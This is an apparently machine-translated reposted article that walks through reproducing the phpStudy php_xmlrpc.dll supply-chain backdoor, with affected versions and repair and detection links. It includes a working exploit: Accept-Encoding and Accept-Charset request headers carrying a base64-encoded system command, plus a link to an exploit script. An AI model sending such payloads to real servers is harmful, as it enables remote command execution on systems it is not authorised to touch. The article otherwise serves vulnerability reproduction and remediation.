Shulou(Shulou.com)06/02 Report--

How to use reproduction in the integrated environment phpstudy backdoor? for this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Introduction to 0x00

PhpStudy is a program integration package for PHP debugging environment. The package integrates the latest Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer, can be installed at one time and can be used without configuration. It is a very convenient and convenient PHP debugging environment.

Overview of 0x01 vulnerabilities

PhpStudy, a widely used PHP environment integration package, was announced to be suspected of being attacked by a supply chain. The package's php_xmlrpc.dll module with PHP hides a back door (from Raytheon testing).

0x02 affects version

PhpStudy20161103 version:

Php5.4.45 and php5.2.17

PhpStudy20180211 version:

Php5.4.45 and php5.2.17

0x03 environment building

The official account replies to "phpstudy environment" and can be installed without brain after decompression.

0x04 vulnerability exploitation

First of all, check whether the back door exists and the location of the back door:

\ phpstudy\ PHPTutorial\ php\ php-5.2.17\ ext\

\ phpstudy\ PHPTutorial\ php\ php-5.4.45\ ext\

Find the php_xmlrpc.dll file in the directory, open it with text, and search for the eval keyword:

As shown in the figure, it can be judged that there is a back door.

Then use the vulnerable PHP version to start the service. I used 5.4.45. The location of the switch version is shown in the figure.

Then access a php file at will, intercept the packet, and add the following request header field:

The space after the comma in accept-Encoding should be removed.

Accept-Charset is the base64 code of system ('ipconfig')

Accept-Encoding:gzip,deflateAccept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

Repeater replays the packet and successfully triggers the backdoor:

0x05 repair mode

Download the original php-5.4.45 version or php-5.2.17 version from the PHP official website and replace the php_xmlrpc.dll in it at the download address:

Https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip

Https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

Detection tools:

Https://www.xp.cn/zijian/

Backdoor utilization script:

Https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

This is the answer to the question about how to use the reproduction of the phpstudy backdoor in the integrated environment. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.